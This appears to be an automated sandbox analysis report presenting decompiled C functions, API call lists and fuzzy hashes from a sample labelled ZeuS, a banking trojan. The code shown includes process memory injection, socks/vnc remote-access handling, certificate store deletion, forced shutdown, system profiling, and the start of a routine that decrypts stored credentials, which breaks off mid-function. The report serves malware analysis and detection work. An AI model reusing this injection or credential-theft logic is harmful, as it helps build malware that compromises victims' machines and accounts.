  • Opcode ID: 47821d2d89af19a63f5beecb4a05f9dfd75e647a1c983ce95bb941014fa1f7da
  • Instruction ID: fb2087c92360e746e9816ed37e6810f150e1723b9e20ca2eb9aa117fe24c8363
  • Opcode Fuzzy Hash: 47821d2d89af19a63f5beecb4a05f9dfd75e647a1c983ce95bb941014fa1f7da
  • Instruction Fuzzy Hash: 0611F7B180024CBFEF119F94DD84EEE7B7DEB04344F004461F652B11A1D7768EA49B28
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 72%
			E00419904(void* __ecx, CHAR** _a4, signed int _a7) {
				signed int _v6;
				signed int _v8;
				char _v9;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				char _v28;
				short _v30;
				intOrPtr _v36;
				char _v44;
				char _v304;
				char _v788;
				char _v792;
				void* __edi;
				void* __esi;
				int _t68;
				signed short _t70;
				signed int _t80;
				void* _t95;
				signed int _t99;
				void* _t102;
				signed int _t108;
				void* _t112;
				CHAR** _t121;
				signed int _t130;
				intOrPtr* _t131;
				intOrPtr* _t138;
				signed int _t139;
				void* _t141;

				_t123 = __ecx;
				E00405299( &_v304,  &_v304, 0, 0x104);
				_t121 = _a4;
				if(lstrcmpiA( *_t121, "socks") != 0) {
					_t68 = lstrcmpiA( *_t121, "vnc");
					__eflags = _t68;
					if(_t68 != 0) {
						_t70 = E00405865( *_t121, _t123, 0);
						_t6 = _t70 - 1; // -1
						_t123 = _t6;
						__eflags = _t6 - 0xfffd;
						if(_t6 > 0xfffd) {
							L32:
							E004092E7( &_v304);
							_a7 = 0;
							if(_v304 <= 0) {
								L34:
								E004051E6( *_t121);
								E004051E6(_t121[1]);
								E004051E6(_t121[2]);
								E004089B9(_t121[3]);
								E004051E6(_t121);
								return 0;
							} else {
								goto L33;
							}
							do {
								L33:
								CloseHandle( *(_t141 + (_a7 & 0x000000ff) * 4 - 0x128));
								_a7 = _a7 + 1;
							} while (_a7 < _v304);
							goto L34;
						}
						_t80 = _t70 & 0x0000ffff;
						_v24 = _t80;
						__eflags = _t80;
						if(_t80 == 0) {
							goto L32;
						}
						L6:
						_t130 = E0040826F(E00405865(_t121[2], _t123, 0), _t123, _t121[1]);
						_v16 = _t130;
						if(_t130 == 0xffffffff) {
							goto L32;
						}
						E004085E1(_t123, _t130);
						E0040859F(_t130);
						_t89 = E0040603D(E0041CC4A(_t123,  &_v792) | 0xffffffff,  &_v788,  &_v44);
						_t144 = _t89;
						if(_t89 == 0) {
							L31:
							E00408589(_t89, _t130);
							goto L32;
						}
						_v9 = E0040B88A( &_v788, _v36, _t144, _t130, 1, _v44);
						_t89 = E0040602B( &_v44);
						if(_v9 == 0) {
							goto L31;
						}
						_t89 = E00408496(0,  &_v16, 0, 0);
						_t130 = _v16;
						if(_t89 != _t130) {
							goto L31;
						}
						while(1) {
							_push(0x7530);
							_push( &_v8);
							_t95 = 4;
							if(E00408199(_t95, _t130) == 0 || _v8 <= 4) {
								break;
							}
							_t138 = E004051B6(_v8 & 0x0000ffff);
							_push(0x7530);
							if(_t138 == 0) {
								_t127 = _v8 & 0x0000ffff;
								_t99 = (_v6 & 0x0000ffff) + (_v8 & 0x0000ffff) - 4;
								L29:
								_push(_t99);
								_push(_t130);
								_t89 = E004081E1(_t127);
								break;
							}
							_push(_t138);
							_t127 = _t130;
							_t102 = E00408199((_v8 & 0x0000ffff) - 4, _t130);
							_push(_t138);
							if(_t102 == 0) {
								L35:
								_t89 = E004051E6();
								break;
							}
							_v30 = _v6;
							_v28 =  *_t138;
							E004051E6();
							if(_v6 != 0) {
								_t139 = E004051B6(_v6 & 0x0000ffff);
								_t99 = _v6 & 0x0000ffff;
								_push(0x7530);
								__eflags = _t139;
								if(_t139 == 0) {
									goto L29;
								}
								_push(_t139);
								_t127 = _t130;
								_t108 = E00408199(_t99, _t130);
								__eflags = _t108;
								if(_t108 == 0) {
									_push(_t139);
									goto L35;
								}
								_v20 = _t139;
								L20:
								if(_v28 == 2 && _v30 == 4) {
									_t112 = 0xc;
									_t131 = E004051B6(_t112);
									if(_t131 != 0) {
										 *_t131 = _a4;
										 *((intOrPtr*)(_t131 + 4)) = _v24;
										 *((intOrPtr*)(_t131 + 8)) =  *_v20;
										if(E004092A2( &_v304, 0x20000, E0041967B, _t131) == 0) {
											E004051E6(_t131);
										}
									}
									E00409250(_t127,  &_v304);
								}
								E004051E6(_v20);
								_t89 = E00408496(0,  &_v16, 0, 0);
								_t130 = _v16;
								if(_t89 == _t130) {
									continue;
								} else {
									break;
								}
							}
							_v20 = _v20 & 0x00000000;
							goto L20;
						}
						_t121 = _a4;
						goto L31;
					}
					_v24 = 0xfffffffe;
					goto L6;
				}
				_v24 = _v24 | 0xffffffff;
				goto L6;
			}

Instruction addresses covered by this listing: 0x00419904 to 0x00419bac

APIs
  • lstrcmpiA.KERNEL32(?,socks,?,00000000,00000104), ref: 00419933
  • lstrcmpiA.KERNEL32(?,vnc), ref: 00419946
  • CloseHandle.KERNEL32(?), ref: 00419B63
    • Part of subcall function 004092A2: SetLastError.KERNEL32(0000009B,0041CF3B,00000000,0041BD55,00000000,004238A8,00000000,00000104,74B5F560,00000000), ref: 004092AC
    • Part of subcall function 004051E6: HeapFree.KERNEL32(00000000,00000000,004069DD,00000000,?,?,?,0041C28A,00000000,0041C766), ref: 004051F9
Strings
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: lstrcmpi$CloseErrorFreeHandleHeapLast
  • String ID: socks$vnc
  • API String ID: 3305036421-270151703
  • Opcode ID: 56c2e5726c3587c2e99f3ad7fd8db4870f3c546a8bdb75a79b0a0b5396871f0e
  • Instruction ID: 67407032ed77c779d342cf1f9e55aefda3007ae350ac48c1e5db64994873977d
  • Opcode Fuzzy Hash: 56c2e5726c3587c2e99f3ad7fd8db4870f3c546a8bdb75a79b0a0b5396871f0e
  • Instruction Fuzzy Hash: 2671D071800115AADF11EB61C991BFE7BB4AF45318F1440ABF944BB2C1DB3C9E81CBA9
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E0040A860(WCHAR* __ecx, void* __eflags) {
				struct _WIN32_FIND_DATAW _v596;
				short _v1116;
				WCHAR* _t38;
				void* _t42;

				_t38 = __ecx;
				if(E0040AA77("*",  &_v1116, __ecx) == 0) {
					L9:
					SetFileAttributesW(_t38, 0x80);
					return RemoveDirectoryW(_t38) & 0xffffff00 | _t19 != 0x00000000;
				}
				_t42 = FindFirstFileW( &_v1116,  &_v596);
				if(_t42 == 0xffffffff) {
					goto L9;
				} else {
					goto L2;
				}
				do {
					L2:
					if(E0040A677( &(_v596.cFileName)) == 0 && E0040AA77( &(_v596.cFileName),  &_v1116, _t38) != 0) {
						_t51 = _v596.dwFileAttributes & 0x00000010;
						if((_v596.dwFileAttributes & 0x00000010) == 0) {
							E0040A548( &_v1116);
						} else {
							E0040A860( &_v1116, _t51);
						}
					}
				} while (FindNextFileW(_t42,  &_v596) != 0);
				FindClose(_t42);
				goto L9;
			}

Instruction addresses covered by this listing: 0x0040a86e to 0x0040a91a

APIs
    • Part of subcall function 0040AA77: PathCombineW.SHLWAPI(0041C3C7,0041C3C7,?,0041C3C7,?,?), ref: 0040AA96
  • FindFirstFileW.KERNEL32(?,?,?), ref: 0040A891
  • FindNextFileW.KERNEL32(00000000,?), ref: 0040A8EC
  • FindClose.KERNEL32(00000000), ref: 0040A8F7
  • SetFileAttributesW.KERNEL32(?,00000080,?), ref: 0040A903
  • RemoveDirectoryW.KERNEL32(?,?,00000080,?), ref: 0040A90A
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: FileFind$AttributesCloseCombineDirectoryFirstNextPathRemove
  • String ID:
  • API String ID: 765042924-0
  • Opcode ID: 788bd1e6f0a7cbe700e6a516b9c68c347416b3fa3895f5d41dc9e0c09789f0bb
  • Instruction ID: 525998673f35c9a886aec5022be3c88710817ef3340b581ddacb40b52d4fcd61
  • Opcode Fuzzy Hash: 788bd1e6f0a7cbe700e6a516b9c68c347416b3fa3895f5d41dc9e0c09789f0bb
  • Instruction Fuzzy Hash: 5E1190320043046AD320FBA4DD49AEB77ECAF45314F048A3FF995E21E0EB389956965B
Uniqueness

Uniqueness Score: -1.00%

APIs
  • CertOpenSystemStoreW.CRYPT32(00000000,004034D0), ref: 0040D165
  • CertDuplicateCertificateContext.CRYPT32(00000000), ref: 0040D17E
  • CertDeleteCertificateFromStore.CRYPT32(00000000,?,?,00000001,0041D09E), ref: 0040D189
  • CertEnumCertificatesInStore.CRYPT32(00000000,00000000), ref: 0040D191
  • CertCloseStore.CRYPT32(00000000,00000000), ref: 0040D19D
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: Cert$Store$Certificate$CertificatesCloseContextDeleteDuplicateEnumFromOpenSystem
  • String ID:
  • API String ID: 1842529175-0
  • Opcode ID: acb7a41491756702a2de7be5948fed1913558742de31d3a4539f3498868ef8a0
  • Instruction ID: a971cc37060601c790609cbb378733f98f7bb19b4ad6eaa53be113373cc6555b
  • Opcode Fuzzy Hash: acb7a41491756702a2de7be5948fed1913558742de31d3a4539f3498868ef8a0
  • Instruction Fuzzy Hash: 24F0A0326812147AD32117B96D18FB7BB6C9F42B91F040133FA88F66A08E389845856C
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 79%
			E0041907D(void* __ebx, void* __ecx) {
				signed int _v124;
				signed char _t12;

				_t12 =  *0x42388c;
				if((_t12 & 0x00000010) == 0) {
					__eflags = _t12 & 0x00000008;
					if(__eflags != 0) {
						E0040CAB3(__ebx, __ecx, __eflags);
						_t12 =  *0x42388c;
					}
					__eflags = _t12 & 0x00000003;
					if((_t12 & 0x00000003) == 0) {
						__eflags = _t12 & 0x00000004;
						if((_t12 & 0x00000004) != 0) {
							goto L8;
						}
						goto L9;
					} else {
						E004068B2(L"SeShutdownPrivilege");
						__eflags = 0;
						__imp__InitiateSystemShutdownExW(0, 0, 0, 1,  *0x42388c >> 0x00000001 & 0x00000001, 0x80000000);
						return 0;
					}
				} else {
					_t12 = E0041D626( &_v124);
					if(_t12 != 0) {
						_v124 = _v124 | 0x00000020;
						 *0x4239b0 =  *0x4239b0 | 0x00000010;
						E0041D67E( &_v124);
						L8:
						return ExitWindowsEx(0x14, 0x80000000);
					}
					L9:
					return _t12;
				}
			}

APIs
  • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000001,?,80000000), ref: 004190E2
    • Part of subcall function 0041D626: CreateMutexW.KERNEL32(004239E8,00000000,00423EF8,?,?,0040CE53,?,?,?,743C152E,00000002), ref: 0041D64C
  • ExitWindowsEx.USER32(00000014,80000000), ref: 004190F5
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: CreateExitInitiateMutexShutdownSystemWindows
  • String ID: $SeShutdownPrivilege
  • API String ID: 3829579691-2253681161
  • Opcode ID: 569a9c211cf9c26b758d03db1a96e6e92bf0f8eee8c5dc1f83e1f0a00eb15d06
  • Instruction ID: 953f36de6ad79133a5a508d25809b9843900d86f62864819fd1a03bafe1b96fb
  • Opcode Fuzzy Hash: 569a9c211cf9c26b758d03db1a96e6e92bf0f8eee8c5dc1f83e1f0a00eb15d06
  • Instruction Fuzzy Hash: DAF0FE716042095AFE24ABF45C56BE93FB89705349F50402DF981F71A2C76C9D838B6D
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 41%
			E00417DDC(char* __ecx, void* __edx, signed int _a4, signed int _a8) {
				char _v5;
				signed int _v12;
				char _v20;
				char _v64;
				char _v552;
				char _v556;
				short _v588;
				void* __ebx;
				void* __esi;
				signed int _t62;
				signed int _t64;
				signed int _t65;
				signed short _t71;
				signed short _t75;
				void* _t92;
				void* _t95;
				void* _t97;
				signed short _t99;
				void* _t100;
				void* _t101;
				void* _t102;
				void* _t103;
				void* _t104;
				void* _t105;
				void* _t109;
				signed int _t111;
				char* _t112;
				void* _t113;

				_t109 = __edx;
				_t106 = __ecx;
				_t111 = _a4;
				_t114 =  *_t111;
				_t99 = 1;
				_v5 = 0;
				if( *_t111 == 0) {
					_t97 = E0040AAD3(_t114);
					 *_t111 = _t97;
					if(_t97 == 0) {
						return 0;
					}
					_v5 = 1;
				}
				__eflags = _a8 & 0x00000001;
				if(__eflags == 0) {
					L9:
					__eflags = _a8 & 0x00000002;
					if((_a8 & 0x00000002) != 0) {
						_push( &_v12);
						_push(0x20000);
						_push(0x2713);
						_t105 = 4;
						_v12 = 0x2000809;
						_t99 = E0040AAE7(_t111, _t105);
					}
					L11:
					__eflags = _a8 & 0x00000004;
					if((_a8 & 0x00000004) == 0) {
						L16:
						__eflags = _t99;
						if(_t99 == 0) {
							L32:
							__eflags = _v5 - 1;
							if(_v5 == 1) {
								E004051E6( *_t111);
								 *_t111 =  *_t111 & 0x00000000;
								__eflags =  *_t111;
							}
							L34:
							return _t99;
						}
						__eflags = _a8 & 0x00000008;
						if((_a8 & 0x00000008) == 0) {
							L20:
							__eflags = _t99;
							if(_t99 == 0) {
								goto L32;
							}
							__eflags = _a8 & 0x00000010;
							if((_a8 & 0x00000010) == 0) {
								L28:
								__eflags = _t99;
								if(_t99 == 0) {
									goto L32;
								}
								__eflags = _a8 & 0x00000020;
								if((_a8 & 0x00000020) != 0) {
									E00417D28(_t106, _t111, 2);
									E00417D28(_t106, _t111, 0x17);
								}
								goto L34;
							}
							_t62 = GetModuleFileNameW(0,  &_v588, 0x103);
							_a4 = _t62;
							__eflags = _t62;
							if(_t62 != 0) {
								__eflags = 0;
								 *((short*)(_t113 + _t62 * 2 - 0x248)) = 0;
								_t106 =  &_v588;
								_t99 = E0040AB94(_t62,  &_v588, _t109, 0, _t111, 0x271e);
							}
							_a4 = 0x104;
							__eflags = _t99;
							if(_t99 == 0) {
								goto L32;
							} else {
								_t64 =  &_v588;
								__imp__GetUserNameExW(2, _t64,  &_a4);
								__eflags = _t64;
								if(_t64 != 0) {
									_t65 = _a4;
									__eflags = _t65;
									if(_t65 != 0) {
										__eflags = 0;
										 *((short*)(_t113 + _t65 * 2 - 0x248)) = 0;
										_t106 =  &_v588;
										_t99 = E0040AB94(_t65,  &_v588, _t109, 0, _t111, 0x271f);
									}
								}
								goto L28;
							}
						}
						_t112 =  &_v20;
						E0041C007(_t112);
						_push(_t112);
						_push(0x20000);
						_push(0x271c);
						_t100 = 6;
						_t71 = E0040AAE7(_a4, _t100);
						_t99 = _t71;
						__eflags = _t99;
						if(_t99 == 0) {
							_t111 = _a4;
							goto L32;
						}
						__imp__GetUserDefaultUILanguage();
						_v12 = _t71 & 0x0000ffff;
						_push( &_v12);
						_push(0x20000);
						_push(0x271d);
						_t101 = 2;
						_t75 = E0040AAE7(_a4, _t101);
						_t111 = _a4;
						_t99 = _t75;
						goto L20;
					}
					__eflags = _t99;
					if(_t99 == 0) {
						goto L32;
					}
					_v12 = E004052E8();
					_push( &_v12);
					_push(0x20000);
					_push(0x2719);
					_t102 = 4;
					_t99 = E0040AAE7(_t111, _t102);
					__eflags = _t99;
					if(_t99 == 0) {
						goto L32;
					}
					_v12 = E00405310();
					_push( &_v12);
					_push(0x20000);
					_push(0x271b);
					_t103 = 4;
					_t99 = E0040AAE7(_t111, _t103);
					__eflags = _t99;
					if(_t99 == 0) {
						goto L32;
					}
					_v12 = GetTickCount();
					_push( &_v12);
					_push(0x20000);
					_push(0x271a);
					_t104 = 4;
					_t99 = E0040AAE7(_t111, _t104);
					goto L16;
				}
				_t92 = E0041CC4A(_t106,  &_v556);
				_t106 =  &_v552;
				_t99 = E0040AB94(_t92,  &_v552, _t109, __eflags, _t111, 0x2711);
				__eflags = _t99;
				if(_t99 == 0) {
					goto L11;
				}
				_t95 = E0041CDA8( &_v552,  &_v64);
				__eflags = _v64;
				if(__eflags != 0) {
					_t106 =  &_v64;
					_t99 = E0040AB94(_t95,  &_v64, _t109, __eflags, _t111, 0x2712);
				}
				__eflags = _t99;
				if(_t99 == 0) {
					goto L11;
				}
				goto L9;
			}

APIs
  • GetTickCount.KERNEL32 ref: 00417EDB
  • GetUserDefaultUILanguage.KERNEL32(0000271C,00020000,?,00000000,?,00000000), ref: 00417F2E
  • GetModuleFileNameW.KERNEL32(00000000,?,00000103,00000000,?,00000000), ref: 00417F70
  • GetUserNameExW.SECUR32(00000002,?,00000104), ref: 00417FB2
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: NameUser$CountDefaultFileLanguageModuleTick
  • String ID:
  • API String ID: 2256650695-0
  • Opcode ID: ce964bb8074c06ca9a7ddb01b19f9ca34787c350bbbef252c669d90c4ce68a2c
  • Instruction ID: 56d4efdc3125b8e07167e228e35abe2e66abe79878b361b1d2cd1bde50609566
  • Opcode Fuzzy Hash: ce964bb8074c06ca9a7ddb01b19f9ca34787c350bbbef252c669d90c4ce68a2c
  • Instruction Fuzzy Hash: 0751B4326843487ADB11DB65D849BDF3BB89F05348F08405AF945AF2C2DB789AC9CB58
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E00409B46(void* __eax, void* _a4) {
				char _v5;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				long _v24;
				void* _t37;
				void* _t42;
				intOrPtr* _t43;
				int _t44;
				long _t46;
				void* _t47;
				SIZE_T* _t48;
				signed int _t50;
				void* _t52;
				void* _t54;
				void* _t55;
				void* _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				unsigned int _t64;

				_t55 = __eax;
				_t60 =  *((intOrPtr*)(__eax + 0x3c)) + __eax;
				_t46 =  *(_t60 + 0x50);
				_v24 = _t46;
				_v5 = 0;
				if(IsBadReadPtr(__eax, _t46) == 0) {
					_t37 = VirtualAllocEx(_a4, 0, _t46, 0x3000, 0x40);
					_v12 = _t37;
					__eflags = _t37;
					if(__eflags == 0) {
						L17:
						return _v12;
					}
					_t47 = E00405239(__eflags, _t55, _t46);
					_t48 = 0;
					__eflags = _t47;
					if(_t47 == 0) {
						L16:
						VirtualFreeEx(_a4, _v12, 0, 0x8000);
						_t32 =  &_v12;
						 *_t32 = _v12 & 0x00000000;
						__eflags =  *_t32;
						goto L17;
					}
					__eflags =  *(_t60 + 0xa4);
					if( *(_t60 + 0xa4) <= 0) {
						L15:
						E004051E6(_t47);
						__eflags = _v5;
						if(_v5 != 0) {
							goto L17;
						}
						goto L16;
					}
					_t42 =  *(_t60 + 0xa0);
					__eflags = _t42;
					if(_t42 <= 0) {
						goto L15;
					}
					_t61 =  *((intOrPtr*)(_t60 + 0x34));
					_t54 = _v12 - _t61;
					_v20 = _t55 - _t61;
					_t43 = _t42 + _t47;
					while(1) {
						__eflags =  *_t43 - _t48;
						if( *_t43 == _t48) {
							break;
						}
						_t62 =  *((intOrPtr*)(_t43 + 4));
						__eflags = _t62 - 8;
						if(_t62 < 8) {
							L12:
							_t43 = _t43 +  *((intOrPtr*)(_t43 + 4));
							_t48 = 0;
							__eflags = 0;
							continue;
						}
						_t64 = _t62 + 0xfffffff8 >> 1;
						__eflags = _t64;
						_v16 = _t48;
						if(_t64 == 0) {
							goto L12;
						} else {
							goto L9;
						}
						do {
							L9:
							_t50 =  *(_t43 + 8 + _v16 * 2) & 0x0000ffff;
							__eflags = _t50;
							if(_t50 != 0) {
								_t52 = (_t50 & 0x00000fff) +  *_t43;
								_t19 = _t52 + _t47;
								 *_t19 =  *(_t52 + _t47) + _t54 - _v20;
								__eflags =  *_t19;
							}
							_v16 = _v16 + 1;
							__eflags = _v16 - _t64;
						} while (_v16 < _t64);
						goto L12;
					}
					_t44 = WriteProcessMemory(_a4, _v12, _t47, _v24, _t48);
					__eflags = _t44;
					_t28 =  &_v5;
					 *_t28 = _t44 != 0;
					__eflags =  *_t28;
					goto L15;
				}
				return 0;
			}

APIs
  • IsBadReadPtr.KERNEL32(?,?,00000000,?,00000000,?,00000000,?,74B5F560,00000000), ref: 00409B62
  • VirtualAllocEx.KERNEL32(74B5F560,00000000,?,00003000,00000040,?,74B5F560,00000000), ref: 00409B80
  • WriteProcessMemory.KERNEL32(74B5F560,74B5F560,00000000,?,00000000,?,?,?,74B5F560,00000000), ref: 00409C12
  • VirtualFreeEx.KERNEL32(74B5F560,74B5F560,00000000,00008000,?,?,?,74B5F560,00000000), ref: 00409C37
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: Virtual$AllocFreeMemoryProcessReadWrite
  • String ID:
  • API String ID: 1273498236-0
  • Opcode ID: a8e148c3872002994075ac7d6953eb160bd0503fb9323fcfe4cf76e36bb8b84f
  • Instruction ID: 3e0b5556d31203645c610b9b14c5460fe23f44edf1fdd2a7e7d811e6d5866f3c
  • Opcode Fuzzy Hash: a8e148c3872002994075ac7d6953eb160bd0503fb9323fcfe4cf76e36bb8b84f
  • Instruction Fuzzy Hash: B8318B72E04209AFDF148FA4CD84BAEBBB4EF45755F04407AE542B72A2C774AD408B58
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E0040685B(intOrPtr _a4) {
				intOrPtr _v20;
				void* _v32;
				signed int _t6;
				signed int _t7;
				int _t9;
				int _t14;
				void* _t15;

				_t14 = 0;
				_t6 = CreateToolhelp32Snapshot(4, 0);
				_t15 = _t6;
				_t7 = _t6 | 0xffffffff;
				if(_t15 != _t7) {
					_v32 = 0x1c;
					_t9 = Thread32First(_t15,  &_v32);
					while(_t9 != 0) {
						if(_v20 == _a4) {
							_t14 = _t14 + 1;
						}
						_t9 = Thread32Next(_t15,  &_v32);
					}
					CloseHandle(_t15);
					return _t14;
				}
				return _t7;
			}

APIs
  • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 00406868
  • Thread32First.KERNEL32 ref: 00406883
  • Thread32Next.KERNEL32 ref: 00406899
  • CloseHandle.KERNEL32(00000000), ref: 004068A4
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: Thread32$CloseCreateFirstHandleNextSnapshotToolhelp32
  • String ID:
  • API String ID: 3643885135-0
  • Opcode ID: 5da51fc52ac16c3558defbd347f8b68f3c28b4b8fc23aa3618eac1f42ae9a567
  • Instruction ID: 5dad353f2e628ab1bc57de377b852eaaebbeb0c9e8b27586ceb2107e512fe895
  • Opcode Fuzzy Hash: 5da51fc52ac16c3558defbd347f8b68f3c28b4b8fc23aa3618eac1f42ae9a567
  • Instruction Fuzzy Hash: E6F054725011156BDB20BB659D48DEF7BBCEB81351B014136F912F21D0D738990286B9
Uniqueness

Uniqueness Score: -1.00%

APIs
  • socket.WS2_32(00000000,00000001,00000006), ref: 00408331
  • bind.WS2_32(00000000,?,-0000001D), ref: 00408351
  • listen.WS2_32(00000000,?), ref: 00408360
  • closesocket.WS2_32(00000000), ref: 0040836B
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: bindclosesocketlistensocket
  • String ID:
  • API String ID: 952684215-0
  • Opcode ID: 23739be4b83d4a1828e01b8661f37a6f06606f36c84d1a26d6dd5267437d6947
  • Instruction ID: f6a5cc976e980c2e4ec193b90207d16f107318b56e2c4f7d03876008abe50fd5
  • Opcode Fuzzy Hash: 23739be4b83d4a1828e01b8661f37a6f06606f36c84d1a26d6dd5267437d6947
  • Instruction Fuzzy Hash: 23F0373260051176D2201F399D4EE2F35A9ABD5BB1B144729F9A2E61F0E739C4919528
Uniqueness

Uniqueness Score: -1.00%

APIs
  • socket.WS2_32(00000000,00000002,00000011), ref: 0040860F
  • bind.WS2_32(00000000,00000017,-0000001D), ref: 0040862F
  • closesocket.WS2_32(00000000), ref: 0040863A
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: bindclosesocketsocket
  • String ID:
  • API String ID: 1873677229-0
  • Opcode ID: a411278c13ec25d2be8f82db56022a938fdf60c5b12948c3625449591d195d6f
  • Instruction ID: b60880ae88efab1d2fcdd3b7002458712cdaf25713cc029af2067e513ce96f1c
  • Opcode Fuzzy Hash: a411278c13ec25d2be8f82db56022a938fdf60c5b12948c3625449591d195d6f
  • Instruction Fuzzy Hash: 75E0483220051066D2201B39EE4EE2F25A99BC67B17154729F9B2E62E1E77889819524
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 72%
			E004130AB(void* __eax, void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				char _v5;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v44;
				signed int _v48;
				void* _v52;
				char _v56;
				char _v72;
				void* _v96;
				char _v196;
				void* __ebx;
				void* __esi;
				intOrPtr _t48;
				intOrPtr _t50;
				intOrPtr _t52;
				intOrPtr _t54;
				signed int _t65;
				void* _t66;
				void* _t68;
				char* _t70;
				intOrPtr _t77;
				signed int* _t82;
				intOrPtr _t95;
				void* _t97;
				signed int _t100;
				void* _t107;
				void* _t109;
				intOrPtr _t115;
				char* _t117;
				void* _t129;

				_t121 = __eflags;
				_t115 = _a4;
				_push(_t115);
				_t92 = __eax;
				_t48 = E00413058(__eax, __eflags, 0x4c);
				_push(_t115);
				_v20 = _t48;
				_t50 = E00413058(_t92, _t121, 0x4f);
				_push(_t115);
				_v24 = _t50;
				_t52 = E00413058(_t92, _t121, 0x50);
				_push(_t115);
				_v28 = _t52;
				_t54 = E00413058(_t92, _t121, 0x4d);
				_push(_t115);
				_v36 = _t54;
				_v12 = E00413058(_t92, _t121, 0x4e);
				_v5 = _v20 != 0;
				if(_v5 != 0) {
					_t95 = _v12;
					_t65 = E00405D35(_t95);
					if(_t95 != 0 && _t65 > 1) {
						_t100 = _t65 & 0x80000001;
						if(_t100 < 0) {
							_t129 = (_t100 - 0x00000001 | 0xfffffffe) + 1;
						}
						if(_t129 == 0) {
							asm("cdq");
							_v48 = _t65 - _t107 >> 1;
							_t77 = E004051B6(_t65 - _t107 >> 1);
							_v44 = _t77;
							if(_t77 != 0) {
								if(E00405A23(_v12, _t77) != 0) {
									_t82 =  &_v48;
									__imp__CryptUnprotectData(_t82, 0, _a8, 0, 0, 0,  &_v56);
									if(_t82 == 1) {
